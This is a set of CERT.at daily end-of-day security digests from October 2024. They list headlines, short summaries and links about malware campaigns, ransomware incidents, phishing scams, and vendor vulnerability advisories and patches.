∗∗∗ F5: K000141463: Multiple Angular JS vulnerabilities CVE-2019-10768, CVE-2023-26116, CVE-2023-26117, and CVE-2023-26118 ∗∗∗
---------------------------------------------
https://my.f5.com/manage/s/article/K000141463
∗∗∗ F5: K000141459: Angular JS vulnerabilities CVE-2019-14863 and CVE-2022-25869 ∗∗∗
---------------------------------------------
https://my.f5.com/manage/s/article/K000141459
∗∗∗ F5: K000141302: Quarterly Security Notification (October 2024) ∗∗∗
---------------------------------------------
https://my.f5.com/manage/s/article/K000141302
∗∗∗ F5: K000140061: BIG-IP monitors vulnerability CVE-2024-45844 ∗∗∗
---------------------------------------------
https://my.f5.com/manage/s/article/K000140061
∗∗∗ F5: K000141080: BIG-IQ vulnerability CVE-2024-47139 ∗∗∗
---------------------------------------------
https://my.f5.com/manage/s/article/K000141080
=====================
= End-of-Day report =
=====================
Timeframe: Monday 14-10-2024 18:00 − Tuesday 15-10-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ TrickMo malware steals Android PINs using fake lock screen ∗∗∗
---------------------------------------------
Forty new variants of the TrickMo Android banking trojan have been identified in the wild, linked to 16 droppers and 22 distinct command and control (C2) infrastructures, with new features designed to steal Android PINs.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/trickmo-malware-steals-andro…
∗∗∗ New FIDO proposal lets you securely move passkeys across platforms ∗∗∗
---------------------------------------------
The Fast IDentity Online (FIDO) Alliance has published a working draft of a new specification that aims to enable the secure transfer of passkeys between different providers.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/new-fido-proposal-lets-you-s…
∗∗∗ BEC-ware the phish (part 1). Investigating incidents in M365 ∗∗∗
---------------------------------------------
This blog post is the first of three that look at the key steps for an effective investigation, response, and remediation of email-based threats in M365. Part two covers response actions as well as short- and long-term remediations to prevent attackers getting back in. Part three considers the native detection and prevention options in M365.
---------------------------------------------
https://www.pentestpartners.com/security-blog/bec-ware-the-phish-part-1-inv…
∗∗∗ Beware of calls from the "Bankbetrugssystem Österreich" ∗∗∗
---------------------------------------------
We are currently again receiving an increased number of reports of recorded calls. A computer-generated voice claims to be the "Bankbetrugssystem Österreich" and asserts that a payment of 1500 euros has been declined and that your account may have been hacked. You are asked to press the "1" key to be connected to a real person. Hang up, this is a scam!
---------------------------------------------
https://www.watchlist-internet.at/news/vorsicht-vor-anrufen-vom-bankbetrugs…
∗∗∗ New Telekopye Scam Toolkit Targeting Booking.com and Airbnb Users ∗∗∗
---------------------------------------------
ESET Research found the Telekopye scam network targeting Booking.com and Airbnb. Scammers use phishing pages via compromised accounts to steal personal and payment details from travelers.
---------------------------------------------
https://hackread.com/telekopye-scam-toolkit-hit-booking-com-airbnb-users/
∗∗∗ CISA Adds Three Known Exploited Vulnerabilities to Catalog ∗∗∗
---------------------------------------------
CVE-2024-30088 Microsoft Windows Kernel TOCTOU Race Condition Vulnerability,
CVE-2024-9680 Mozilla Firefox Use-After-Free Vulnerability,
CVE-2024-28987 SolarWinds Web Help Desk Hardcoded Credential Vulnerability
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2024/10/15/cisa-adds-three-known-ex…
∗∗∗ Fortinet FortiGate CVE-2024-23113 - A Super Complex Vulnerability In A Super Secure Appliance In 2024 ∗∗∗
---------------------------------------------
Today we'd like to share a recent journey into (yet another) SSLVPN appliance vulnerability - a Format String vulnerability, unusually, in Fortinet's FortiGate devices. It affected (before patching) all currently-maintained branches, and was recently highlighted by CISA as being exploited in the wild.
---------------------------------------------
https://labs.watchtowr.com/fortinet-fortigate-cve-2024-23113-a-super-comple…
=====================
= Vulnerabilities =
=====================
∗∗∗ Splunk Security Advisories 2024-10-14 ∗∗∗
---------------------------------------------
Splunk released 12 security advisories: 4x high, 8x medium
---------------------------------------------
https://advisory.splunk.com//advisories
∗∗∗ Critical vulnerabilities in mbNET industrial routers ∗∗∗
---------------------------------------------
Several security vulnerabilities, some of them severe, have been identified in mbNET industrial remote maintenance gateways and industrial routers. They make it possible to fully compromise the device and to decrypt encrypted configurations.
---------------------------------------------
https://www.syss.de/pentest-blog/kritische-schwachstellen-in-industrieroute…
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (container-tools:rhel8, firefox, OpenIPMI, podman, and thunderbird), Debian (libapache-mod-jk, php7.4, and webkit2gtk), Fedora (edk2, koji, libgsf, rust-hyper-rustls, rust-reqwest, rust-rustls-native-certs, rust-rustls-native-certs0.7, rust-tonic, rust-tonic-build, rust-tonic-types, rust-tower, rust-tower-http, rust-tower-http0.5, and rust-tower0.4), Mageia (packages and thunderbird), Oracle (bind, container-tools:ol8, kernel, kernel-container, OpenIPMI, podman, and thunderbird), Red Hat (container-tools:rhel8, containernetworking-plugins, podman, and skopeo), SUSE (argocd-cli, bsdtar, keepalived, kernel, kyverno, libmozjs-115-0, libmozjs-128-0, libmozjs-78-0, OpenIPMI, opensc, php8, thunderbird, and xen), and Ubuntu (configobj, haproxy, imagemagick, nginx, and postgresql-10, postgresql-9.3).
---------------------------------------------
https://lwn.net/Articles/994268/
∗∗∗ WordPress plugin Jetpack fixes nearly decade-old critical security flaw ∗∗∗
---------------------------------------------
The popular WordPress plugin Jetpack has released a critical security update, addressing a vulnerability that could have affected 27 million websites. [..] The flaw, which is not believed to have been exploited, was found in the plugin’s contact form feature and had remained unpatched since 2016. This vulnerability could be exploited by any logged-in user on a site to read forms submitted by other users, according to Jetpack engineer Jeremy Herve.
---------------------------------------------
https://therecord.media/wordpress-jetpack-plugin-fixes-flaw
∗∗∗ ZDI-24-1382: QEMU SCSI Use-After-Free Local Privilege Escalation Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-24-1382/
∗∗∗ Zahlreiche Schwachstellen im Rittal IoT Interface & CMC III Processing Unit ∗∗∗
---------------------------------------------
https://sec-consult.com/de/vulnerability-lab/advisory/zahlreiche-schwachste…
∗∗∗ GitHub Enterprise Server (GHES) Security Update Advisory (CVE-2024-9487) ∗∗∗
---------------------------------------------
https://asec.ahnlab.com/en/83868/
∗∗∗ Kubernetes: CVE-2024-9594 ∗∗∗
---------------------------------------------
https://github.com/kubernetes/kubernetes/issues/128007
∗∗∗ Kubernetes: CVE-2024-9486 ∗∗∗
---------------------------------------------
https://github.com/kubernetes/kubernetes/issues/128006
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Freitag 11-10-2024 18:00 − Montag 14-10-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Microsoft deprecates PPTP and L2TP VPN protocols in Windows Server ∗∗∗
---------------------------------------------
Microsoft has officially deprecated the Point-to-Point Tunneling Protocol (PPTP) and Layer 2 Tunneling Protocol (L2TP) in future versions of Windows Server, recommending admins switch to different protocols that offer increased security.
---------------------------------------------
https://www.bleepingcomputer.com/news/microsoft/microsoft-deprecates-pptp-a…
∗∗∗ Google warns uBlock Origin and other extensions may be disabled soon ∗∗∗
---------------------------------------------
Google's Chrome Web Store is now warning that the uBlock Origin ad blocker and other extensions may soon be blocked as part of the company's deprecation of the Manifest V2 extension specification.
---------------------------------------------
https://www.bleepingcomputer.com/news/google/google-warns-ublock-origin-and…
∗∗∗ Microsoft’s guidance to help mitigate Kerberoasting ∗∗∗
---------------------------------------------
Kerberoasting, a well-known Active Directory (AD) attack vector, enables threat actors to steal credentials and navigate through devices and networks. Microsoft is sharing recommended actions administrators can take now to help prevent successful Kerberoasting cyberattacks.
---------------------------------------------
https://www.microsoft.com/en-us/security/blog/2024/10/11/microsofts-guidanc…
∗∗∗ Nation-State Attackers Exploiting Ivanti CSA Flaws for Network Infiltration ∗∗∗
---------------------------------------------
A suspected nation-state adversary has been observed weaponizing three security flaws in Ivanti Cloud Service Appliance (CSA) as a zero-day to perform a series of malicious actions. That's according to findings from Fortinet FortiGuard Labs, which said the vulnerabilities were abused to gain unauthenticated access to the CSA, enumerate users configured in the appliance, and attempt to access the credentials of those users.
---------------------------------------------
https://thehackernews.com/2024/10/nation-state-attackers-exploiting.html
∗∗∗ Chatbot Traps: How to Avoid Job Scams ∗∗∗
---------------------------------------------
While the strategies outlined here can help you detect AI-powered scams, it is important to recognise that AI technology is advancing rapidly. Many current weaknesses—such as difficulties with complex questions or live conversations—may diminish as AI continues to improve.
---------------------------------------------
https://connect.geant.org/2024/10/14/chatbot-traps-how-to-avoid-job-scams
∗∗∗ Casio says ransomware attack exposed info of employees, customers and business partners ∗∗∗
---------------------------------------------
Japanese electronics manufacturer Casio confirmed on Friday that a cyber incident announced earlier this week was a ransomware attack that potentially exposed the information of employees, customers, business partners and affiliates.
---------------------------------------------
https://therecord.media/casio-ransomware-attack-exposed-emplyee-customer-da…
∗∗∗ Warning: new text-based QR code phishing variants ∗∗∗
---------------------------------------------
Security researchers at Barracuda have come across a new variant in the design of phishing messages. These use QR codes made of text-based ASCII/Unicode characters instead of the usual static images in order to evade conventional security measures.
---------------------------------------------
https://www.borncity.com/blog/2024/10/13/achtung-neue-textbasierte-qr-code-…
∗∗∗ Vulnerability in Ecovacs robot vacuums allows remote control by hackers ∗∗∗
---------------------------------------------
In the USA there is a growing number of cases in which hacked robot vacuums, apparently under remote control, shout insults and transmit images via the built-in camera.
---------------------------------------------
https://heise.de/-9979104
=====================
= Vulnerabilities =
=====================
∗∗∗ Emergency update: Tor users attacked via critical Firefox vulnerability ∗∗∗
---------------------------------------------
A critical Firefox vulnerability also affects the Tor Browser and Thunderbird. Patches are available, but for some Tor users they come too late.
---------------------------------------------
https://www.golem.de/news/notfall-update-tor-nutzer-ueber-kritische-firefox…
∗∗∗ Moxa: Missing Authentication and OS Command Injection Vulnerabilities in Cellular Routers, Secure Routers, and Network Security Appliances ∗∗∗
---------------------------------------------
The first vulnerability, CVE-2024-9137, allows attackers to manipulate device configurations without authentication. The second vulnerability, CVE-2024-9139, permits OS command injection through improperly restricted commands, potentially enabling attackers to execute arbitrary code.
---------------------------------------------
https://www.moxa.com/en/support/product-support/security-advisory/mpsa-2411…
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (docker.io, libreoffice, node-dompurify, python-reportlab, and thunderbird), Fedora (buildah, chromium, kernel, kernel-headers, libgsf, mosquitto, p7zip, podman, python-cramjam, python-virtualenv, redis, rust-async-compression, rust-brotli, rust-brotli-decompressor, rust-libcramjam, rust-libcramjam0.2, rust-nu-command, rust-nu-protocol, rust-redlib, rust-tower-http, thunderbird, and webkit2gtk4.0), Oracle (.NET 6.0, .NET 8.0, e2fsprogs, firefox, golang, openssl, python3-setuptools, systemd, and thunderbird), SUSE (chromium, firefox, java-jwt, libmozjs-128-0, libwireshark18, ntpd-rs, OpenIPMI, thunderbird, and wireshark), and Ubuntu (firefox, python2.7, python3.5, thunderbird, and ubuntu-advantage-desktop-daemon).
---------------------------------------------
https://lwn.net/Articles/994080/
∗∗∗ Security update: attackers can crash the Wireshark network analysis tool ∗∗∗
---------------------------------------------
Wireshark has been released in a version hardened against possible attacks. The developers have also fixed several bugs in it.
---------------------------------------------
https://heise.de/-9979991
∗∗∗ ZDI-24-1374: IrfanView SID File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-24-1374/
∗∗∗ ZDI-24-1369: Zimbra GraphQL Cross-Site Request Forgery Information Disclosure Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-24-1369/
∗∗∗ Security Vulnerability fixed in Firefox 131.0.3 ∗∗∗
---------------------------------------------
https://www.mozilla.org/en-US/security/advisories/mfsa2024-53/
=====================
= End-of-Day report =
=====================
Timeframe: Donnerstag 10-10-2024 18:00 − Freitag 11-10-2024 18:00
Handler: Robert Waldner
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Akira and Fog ransomware now exploit critical Veeam RCE flaw ∗∗∗
---------------------------------------------
Ransomware gangs now exploit a critical security vulnerability that lets attackers gain remote code execution (RCE) on vulnerable Veeam Backup & Replication (VBR) servers.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/akira-and-fog-ransomware-now…
∗∗∗ Digital war: Russian hackers said to be using Zimbra and TeamCity exploits ∗∗∗
---------------------------------------------
State-backed Russian hackers are targeting Zimbra and JetBrains TeamCity installations of Western companies, the USA and the UK warn.
---------------------------------------------
https://www.golem.de/news/digitaler-krieg-russische-hacker-sollen-zimbra-un…
∗∗∗ Bohemia and Cannabia Dark Web Markets Taken Down After Joint Police Operation ∗∗∗
---------------------------------------------
The Dutch police have announced the takedown of Bohemia and Cannabia, which has been described as the world's largest and longest-running dark web market for illegal goods, drugs, and cybercrime services. The takedown is the result of a collaborative investigation with Ireland, the United Kingdom, and the United States that began towards the end of 2022, the Politie said.
---------------------------------------------
https://thehackernews.com/2024/10/bohemia-and-cannabia-dark-web-markets.html
∗∗∗ Perfecting Ransomware on AWS — Using keys to the kingdom to change the locks ∗∗∗
---------------------------------------------
If someone asked me what was the best way to make money from a compromised AWS Account (assume root access even) — I would have answered “dump the data and hope that no-one notices you before you finish it up.” This answer would have been valid until ~8 months ago when I stumbled upon a lesser known feature of AWS KMS which allows an attacker to do devastating ransomware attacks on a compromised AWS account.
---------------------------------------------
https://medium.com/@harsh8v/redefining-ransomware-attacks-on-aws-using-aws-…
∗∗∗ Wordfence Intelligence Weekly WordPress Vulnerability Report (September 30, 2024 to October 6, 2024) ∗∗∗
---------------------------------------------
Last week, there were 161 vulnerabilities disclosed in 147 WordPress Plugins and 5 WordPress Themes that have been added to the Wordfence Intelligence Vulnerability Database
---------------------------------------------
https://www.wordfence.com/blog/2024/10/wordfence-intelligence-weekly-wordpr…
∗∗∗ Lynx Ransomware: A Rebranding of INC Ransomware ∗∗∗
---------------------------------------------
Lynx ransomware shares a significant portion of its source code with INC ransomware. INC ransomware initially surfaced in August 2023 and had variants compatible with both Windows and Linux. While we haven't confirmed any Linux samples yet for Lynx ransomware, we have noted Windows samples. This ransomware operates using a ransomware-as-a-service (RaaS) model.
---------------------------------------------
https://unit42.paloaltonetworks.com/inc-ransomware-rebrand-to-lynx/
∗∗∗ Octo2 Malware Uses Fake NordVPN, Chrome Apps to Infect Android Devices ∗∗∗
---------------------------------------------
Octo2 malware is targeting Android devices by disguising itself as popular apps like NordVPN and Google Chrome.
---------------------------------------------
https://hackread.com/octo2-malware-fake-nordvpn-chrome-apps-android-device/
∗∗∗ Best Practices to Configure BIG-IP LTM Systems to Encrypt HTTP Persistence Cookies ∗∗∗
---------------------------------------------
CISA has observed cyber threat actors leveraging unencrypted persistent cookies managed by the F5 BIG-IP Local Traffic Manager (LTM) module to enumerate other non-internet facing devices on the network. [..] CISA urges organizations to encrypt persistent cookies employed in F5 BIG-IP devices and review the following article for details on how to configure the BIG-IP LTM system to encrypt HTTP cookies.
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2024/10/10/best-practices-configure…
∗∗∗ EU Council puts the Cyber Resilience Act on track ∗∗∗
---------------------------------------------
In future, networked products placed on the market in the EU must be secured against attacks and signal this with the CE mark.
---------------------------------------------
https://heise.de/-9977103
=====================
= Vulnerabilities =
=====================
∗∗∗ New Critical GitLab Vulnerability Could Allow Arbitrary CI/CD Pipeline Execution ∗∗∗
---------------------------------------------
GitLab has released security updates for Community Edition (CE) and Enterprise Edition (EE) to address eight security flaws, including a critical bug that could allow running Continuous Integration and Continuous Delivery (CI/CD) pipelines on arbitrary branches.
---------------------------------------------
https://thehackernews.com/2024/10/new-critical-gitlab-vulnerability-could.h…
∗∗∗ Privileged admin able to view device summary for device in different [FortiManager] ADOM ∗∗∗
---------------------------------------------
An exposure of sensitive information to an unauthorized actor vulnerability [CWE-200] in FortiManager Administrative Domain (ADOM) may allow a remote authenticated attacker assigned to an ADOM to access device summary of other ADOMs via crafted HTTP requests.
---------------------------------------------
https://fortiguard.fortinet.com/psirt/FG-IR-23-472
∗∗∗ Aw, Sugar. Critical Vulnerabilities in SugarWOD ∗∗∗
---------------------------------------------
It is possible to:
* Enumerate 2 million users, names, profile pics, birthday, height, weight, and email addresses
* Extract all Gyms join passwords
[..]
* Bypass user-chosen privacy settings
---------------------------------------------
https://www.n00py.io/2024/10/critical-vulnerabilities-in-sugarwod/
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (.NET 6.0, .NET 8.0, and openssl), Debian (firefox-esr), Fedora (firefox), Mageia (php, quictls, and vim), Red Hat (buildah, container-tools:rhel8, containernetworking-plugins, firefox, podman, skopeo, and tomcat), Slackware (mozilla), SUSE (apache-commons-io, kernel, and xen), and Ubuntu (golang-1.17, libgsf, and linux-aws-6.8, linux-oracle-6.8).
---------------------------------------------
https://lwn.net/Articles/993778/
∗∗∗ Security Vulnerability fixed in Thunderbird 131.0.1, Thunderbird 128.3.1, Thunderbird 115.16.0 ∗∗∗
---------------------------------------------
* CVE-2024-9680: Use-after-free in Animation timeline
---------------------------------------------
https://www.mozilla.org/en-US/security/advisories/mfsa2024-52/
∗∗∗ Livewire Security Update Advisory (CVE-2024-47823) ∗∗∗
---------------------------------------------
The extension of a loaded file is guessed based on its MIME type, which could allow an attacker to conduct a remote code execution (RCE) attack by uploading a “.php” file with a valid MIME type.
---------------------------------------------
https://asec.ahnlab.com/en/83775/
∗∗∗ Apache Software Security Update Advisory (CVE-2024-45720, CVE-2024-47561) ∗∗∗
---------------------------------------------
* CVE-2024-45720: Subversion versions: ~ 1.14.3 (inclusive) (Windows)
* CVE-2024-47561: Apache Avro Java SDK versions: ~ 1.11.4 (excluded)
---------------------------------------------
https://asec.ahnlab.com/en/83776/
∗∗∗ Anonymising Linux: Tails 6.8.1 closes critical security hole ∗∗∗
---------------------------------------------
Tails Linux, intended for anonymous browsing, closes a security vulnerability in version 6.8.1. It also improves the handling of persistent storage.
---------------------------------------------
https://heise.de/-9977905
∗∗∗ baserCMS plugin "BurgerEditor" vulnerable to directory listing ∗∗∗
---------------------------------------------
https://jvn.jp/en/jp/JVN54676967/
∗∗∗ ABB Cylon Aspect 3.07.02 (sshUpdate.php) Unauthenticated Remote SSH Service Control ∗∗∗
---------------------------------------------
https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5838.php
=====================
= End-of-Day report =
=====================
Timeframe: Mittwoch 09-10-2024 18:00 − Donnerstag 10-10-2024 18:00
Handler: Robert Waldner
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Firefox Zero-Day Under Attack: Update Your Browser Immediately ∗∗∗
---------------------------------------------
Mozilla has revealed that a critical security flaw impacting Firefox and Firefox Extended Support Release (ESR) has come under active exploitation in the wild. The vulnerability, tracked as CVE-2024-9680, has been described as a use-after-free bug in the Animation timeline component.
---------------------------------------------
https://thehackernews.com/2024/10/mozilla-warns-of-active-exploitation-in.h…
∗∗∗ CISA says critical Fortinet RCE flaw now exploited in attacks ∗∗∗
---------------------------------------------
Today, CISA revealed that attackers actively exploit a critical FortiOS remote code execution (RCE) vulnerability in the wild.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/cisa-says-critical-fortinet-…
∗∗∗ Is anyone here using a smartphone with a Qualcomm SoC? ∗∗∗
---------------------------------------------
For many Android devices out there, the answer is: yes. The zero-day vulnerability, officially designated CVE-2024-43047, "may be under limited, targeted exploitation," according to Qualcomm, citing unspecified "indications" from Google's Threat Analysis Group, the company's research unit that investigates government hacking threats.
---------------------------------------------
http://blog.fefe.de/?ts=99f9d232
∗∗∗ Magenta ID has been deactivated: beware of deceptively genuine phishing mail ∗∗∗
---------------------------------------------
A very well-forged Magenta email is currently circulating in Austria. Anyone who looks closely can expose it.
---------------------------------------------
https://futurezone.at/digital-life/magenta-id-wurde-deaktiviert-mail-phishi…
∗∗∗ Malware by the (Bit)Bucket: Unveiling AsyncRAT ∗∗∗
---------------------------------------------
Recently, we uncovered a sophisticated attack campaign employing a multi-stage approach to deliver AsyncRAT via a legitimate platform called Bitbucket.
---------------------------------------------
https://www.gdatasoftware.com/blog/2024/10/38043-asyncrat-bitbucket
∗∗∗ File hosting services misused for identity phishing ∗∗∗
---------------------------------------------
Since mid-April 2024, Microsoft has observed an increase in defense evasion tactics used in campaigns abusing file hosting services like SharePoint, OneDrive, and Dropbox. These campaigns use sophisticated techniques to perform social engineering, evade detection, and compromise identities, and include business email compromise (BEC) attacks.
---------------------------------------------
https://www.microsoft.com/en-us/security/blog/2024/10/08/file-hosting-servi…
∗∗∗ Technical Analysis of DarkVision RAT ∗∗∗
---------------------------------------------
DarkVision RAT is a highly customizable remote access trojan (RAT) that first surfaced in 2020, offered on Hack Forums and their website for as little as $60. Written in C/C++ and assembly, DarkVision RAT has gained popularity due to its affordability and extensive feature set, making it accessible even to low-skilled cybercriminals. The RAT's capabilities include keylogging, taking screenshots, file manipulation, process injection, remote code execution, and password theft.
---------------------------------------------
https://www.zscaler.com/blogs/security-research/technical-analysis-darkvisi…
∗∗∗ Ransom & Dark Web Issues Week 2, October 2024 ∗∗∗
---------------------------------------------
* New Target of KillSec Ransomware Attack: South Korean Commercial Property Content Provider
* Dark Web Market Bohemia/Cannabia Shut Down by Law Enforcement, Two Administrators Arrested
* New Ransomware Gang Sarcoma: Conducted Attacks on a Total of 30 Companies
---------------------------------------------
https://asec.ahnlab.com/en/83739/
∗∗∗ Internet Archive under fire: over 30 million user records stolen ∗∗∗
---------------------------------------------
Unknown attackers have repeatedly targeted the Internet Archive. Already in September, user data and password hashes were exfiltrated.
---------------------------------------------
https://heise.de/-9975986
=====================
= Vulnerabilities =
=====================
∗∗∗ GitLab warns of critical arbitrary branch pipeline execution flaw ∗∗∗
---------------------------------------------
GitLab has released security updates to address multiple flaws in Community Edition (CE) and Enterprise Edition (EE), including a critical arbitrary branch pipeline execution flaw.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/gitlab-warns-of-critical-arb…
∗∗∗ Experts Warn of Critical Unpatched Vulnerability in Linear eMerge E3 Systems ∗∗∗
---------------------------------------------
Cybersecurity researchers are warning about an unpatched vulnerability in Nice Linear eMerge E3 access controller systems that could allow for the execution of arbitrary operating system (OS) commands. The flaw, assigned the CVE identifier CVE-2024-9441, carries a CVSS score of 9.8 out of a maximum of 10.0, according to VulnCheck.
---------------------------------------------
https://thehackernews.com/2024/10/experts-warn-of-critical-unpatched.html
∗∗∗ wkhtmltopdf - Highly critical - Unsupported - SA-CONTRIB-2024-049 ∗∗∗
---------------------------------------------
Project: wkhtmltopdf
Date: 2024-October-09
Security risk: Highly critical 23 ∕ 25 AC:None/A:None/CI:All/II:All/E:Proof/TD:All
Vulnerability: Unsupported
Affected versions: *
Description: The security team is marking this project unsupported. There is a known security issue with the project that has not been fixed by the maintainer. If you would like to maintain this project, please read: https://www.drupal.org/node/251466#procedure---own-project---unsupported
Sol…: If you use this project,
---------------------------------------------
https://www.drupal.org/sa-contrib-2024-049
∗∗∗ Facets - Critical - Cross Site Scripting - SA-CONTRIB-2024-047 ∗∗∗
---------------------------------------------
Project: Facets
Date: 2024-October-09
Security risk: Critical 15 ∕ 25 AC:Basic/A:None/CI:Some/II:Some/E:Theoretical/TD:Default
Vulnerability: Cross Site Scripting
Affected versions:
Description: This module enables you to easily create and manage faceted search interfaces. The module doesn't sufficiently filter for malicious script, leading to a reflected cross site scripting (XSS) vulnerability.
Solution: Install the latest version: If you use the Facets module, upgrade to Facets
---------------------------------------------
https://www.drupal.org/sa-contrib-2024-047
∗∗∗ Block permissions - Moderately critical - Access bypass - SA-CONTRIB-2024-046 ∗∗∗
---------------------------------------------
Project: Block permissions
Date: 2024-October-09
Security risk: Moderately critical 13 ∕ 25 AC:Basic/A:Admin/CI:Some/II:Some/E:Theoretical/TD:All
Vulnerability: Access bypass
Affected versions: >=1.0.0
Description: This module enables you to manage blocks from specific modules in specific themes. The module doesn't sufficiently check permissions under the scenario when a block is added using the form "/admin/structure/block/add/{plugin_id}/{theme}" (route
---------------------------------------------
https://www.drupal.org/sa-contrib-2024-046
∗∗∗ Monster Menus - Moderately critical - Access bypass, Information Disclosure - SA-CONTRIB-2024-045 ∗∗∗
---------------------------------------------
Project: Monster Menus
Date: 2024-October-09
Security risk: Moderately critical 13 ∕ 25 AC:None/A:None/CI:Some/II:None/E:Theoretical/TD:Uncommon
Vulnerability: Access bypass, Information Disclosure
Affected versions:
Description: This module enables you to group nodes within pages that have a highly granular, distributed permissions structure. A function which can be used by third-party code does not return valid data under certain rare circumstances. If the third-party code relies on this
---------------------------------------------
https://www.drupal.org/sa-contrib-2024-045
∗∗∗ Gutenberg - Moderately critical - Cross Site Request Forgery - SA-CONTRIB-2024-048 ∗∗∗
---------------------------------------------
Project: Gutenberg
Date: 2024-October-09
Security risk: Moderately critical 12 ∕ 25 AC:Basic/A:None/CI:None/II:Some/E:Theoretical/TD:Default
Vulnerability: Cross Site Request Forgery
Affected versions: =3.0.0
Description: This module provides a new UI experience for node editing using the Gutenberg Editor library. The module did not sufficiently protect some routes against a Cross Site Request Forgery attack. This vulnerability is mitigated by the fact that the tricked user needs to have an
---------------------------------------------
https://www.drupal.org/sa-contrib-2024-048
∗∗∗ VMSA-2024-0020:VMware NSX updates address multiple vulnerabilities (CVE-2024-38818, CVE-2024-38817, CVE-2024-38815) ∗∗∗
---------------------------------------------
Multiple vulnerabilities in VMware NSX were responsibly reported to VMware. Updates are available to remediate these vulnerabilities in the affected VMware products.
---------------------------------------------
https://support.broadcom.com/web/ecx/support-=content-notification/-/extern…
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (chromium), Fedora (firefox, koji, unbound, webkit2gtk4.0, and xen), Red Hat (glibc, net-snmp, and tomcat), Slackware (mozilla), SUSE (apache-commons-io, buildah, cups-filters, liboath-devel, libreoffice, libunbound8, podman, and redis), and Ubuntu (cups-browsed, cups-filters, edk2, linux-raspi-5.4, and oath-toolkit).
---------------------------------------------
https://lwn.net/Articles/993595/
∗∗∗ Redis Vulnerability Security Update Advisory (CVE-2024-31449) ∗∗∗
---------------------------------------------
An update has been released to address vulnerabilities in Redis. Users of the affected versions are advised to update to the latest version.
---------------------------------------------
https://asec.ahnlab.com/en/83704/
∗∗∗ Ivanti Product Security Update Advisory ∗∗∗
---------------------------------------------
* CVE-2024-9380, CVE-2024-9381: Ivanti Cloud Services Appliance (CSA) versions: ~ 5.0.1 (inclusive)
* CVE-2024-7612: Ivanti EPMM (Core) versions: ~ 12.1.0.3 (inclusive)
* CVE-2024-9167: Velocity License Server versions: 5.1 (inclusive) ~ 5.1.2 (inclusive)
---------------------------------------------
https://asec.ahnlab.com/en/83706/
∗∗∗ Adobe Family October 2024 Routine Security Update Advisory ∗∗∗
---------------------------------------------
Adobe has released a security update that addresses a vulnerability in its supplied products. Users of affected systems are advised to update to the latest version.
---------------------------------------------
https://asec.ahnlab.com/en/83710/
∗∗∗ SAP Product Security Update Advisory ∗∗∗
---------------------------------------------
* CVE-2024-37179: SAP BusinessObjects Business Intelligence Platform, ENTERPRISE 420, 430, 2025, Enterprise clienttools 420
* CVE-2024-41730: SAP BusinessObjects Business Intelligence Platform, ENTERPRISE 430, 440
* CVE-2024-39592: SAP PDCE, S4CORE 102, S4CORE 103, S4COREOP 104, S4COREOP 105, S4COREOP 106, S4COREOP 107, S4COREOP 108
---------------------------------------------
https://asec.ahnlab.com/en/83736/
∗∗∗ SonicWall SSL-VPN SMA1000 and Connect Tunnel Windows Client Affected By Multiple Vulnerabilities ∗∗∗
---------------------------------------------
1) CVE-2024-45315 - SonicWALL SMA1000 Connect Tunnel Windows Client Link Following Denial-of-Service Vulnerability
2) CVE-2024-45316 - SonicWALL SMA1000 Connect Tunnel Windows Client Link Following Local Privilege Escalation Vulnerability
3) CVE-2024-45317 - Unauthenticated SMA1000 12.4.x Server-Side Request Forgery (SSRF) Vulnerability
---------------------------------------------
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0017
∗∗∗ CISA Releases Twenty-One Industrial Control Systems Advisories ∗∗∗
---------------------------------------------
* ICSA-24-284-01 Siemens SIMATIC S7-1500 and S7-1200 CPUs
* ICSA-24-284-02 Siemens Simcenter Nastran
* ICSA-24-284-03 Siemens Teamcenter Visualization and JT2Go
* ICSA-24-284-04 Siemens SENTRON PAC3200 Devices
* ICSA-24-284-05 Siemens Questa and ModelSim
* ICSA-24-284-06 Siemens SINEC Security Monitor
* ICSA-24-284-07 Siemens JT2Go
* ICSA-24-284-08 Siemens HiMed Cockpit
* ICSA-24-284-09 Siemens PSS SINCAL
* ICSA-24-284-10 Siemens SIMATIC S7-1500 CPUs
* ICSA-24-284-11 Siemens RUGGEDCOM APE1808
* ICSA-24-284-12 Siemens Sentron Powercenter 1000
* ICSA-24-284-13 Siemens Tecnomatix Plant Simulation
* ICSA-24-284-14 Schneider Electric Zelio Soft 2
* ICSA-24-284-15 Rockwell Automation DataMosaix Private Cloud
* ICSA-24-284-16 Rockwell Automation DataMosaix Private Cloud
* ICSA-24-284-17 Rockwell Automation Verve Asset Manager
* ICSA-24-284-18 Rockwell Automation Logix Controllers
* ICSA-24-284-19 Rockwell Automation PowerFlex 6000T
* ICSA-24-284-20 Rockwell Automation ControlLogix
* ICSA-24-284-21 Delta Electronics CNCSoft-G2
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2024/10/10/cisa-releases-twenty-one…
∗∗∗ Synacor Zimbra Collaboration Command Execution Vulnerability ∗∗∗
---------------------------------------------
Threat Actors are exploiting a recently fixed RCE vulnerability in Zimbra email servers, which can be exploited just by sending specially crafted emails to the SMTP server.
---------------------------------------------
